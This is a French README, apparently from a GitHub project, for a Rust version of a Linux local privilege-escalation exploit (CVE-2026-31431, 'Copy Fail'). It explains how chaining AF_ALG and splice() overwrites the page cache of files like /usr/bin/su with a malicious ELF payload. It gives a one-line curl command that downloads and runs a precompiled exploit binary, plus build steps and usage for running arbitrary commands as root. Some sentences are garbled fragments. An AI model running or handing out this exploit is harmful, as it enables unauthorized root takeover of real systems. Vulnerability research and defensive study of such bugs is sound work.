
Copie de l'exploit Fail (CVE-2026-31431) mais en Rust.
Exploit Copy Fail (CVE-2026-31431) mais en Rust, une vulnérabilité critique enchaînant AF_ALG et splice() pour réaliser une écriture de 4 octets dans le cache de pages, conduisant à une élévation de privilèges locale sur les principales distributions Linux.
Basé sur les recherches et le PoC de Xint Code.
[!CAUTION] Ce projet est uniquement à des fins éducatives et de recherche. Exécuter cet exploit sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégal et contraire à l'éthique. Utilisez ce code de manière responsable pour comprendre et vous défendre contre des vulnérabilités similaires.
AF_ALG et splice() du noyau Linux via libc.Vous pouvez télécharger et exécuter directement le binaire PoC précompilé :
curl -L https://github.com/sammwyy/copyfail-rs/releases/download/poc/copyfail-rs_x86-64 -o copyfail-rs && chmod +x copyfail-rs && ./copyfail-rs
/usr/bin/su).Clonez le dépôt et compilez le binaire :
git clone https://github.com/sammwyy/copyfail-rs.git
cd copyfail-rs
cargo build --release
Exécutez l'exploit sans arguments pour utiliser /bin/sh par défaut :
./target/release/copyfail-rs
Ou spécifiez une commande personnalisée à exécuter en tant que root :
./target/release/copyfail-rs "whoami > /tmp/pwned"
L'exploit exploite un bug dans l'implémentation authencesn de l'API Crypto du noyau Linux (AF_ALG). En enchaînant sendmsg avec MSG_MORE et splice(), il est possible d'écraser de petits blocs du cache de pages pour des fichiers arbitraires (comme /usr/bin/su) avec une charge utile ELF malveillante.
AF_ALG et le lie à authencesn(hmac(sha256),cbc(aes)).AF_ALG.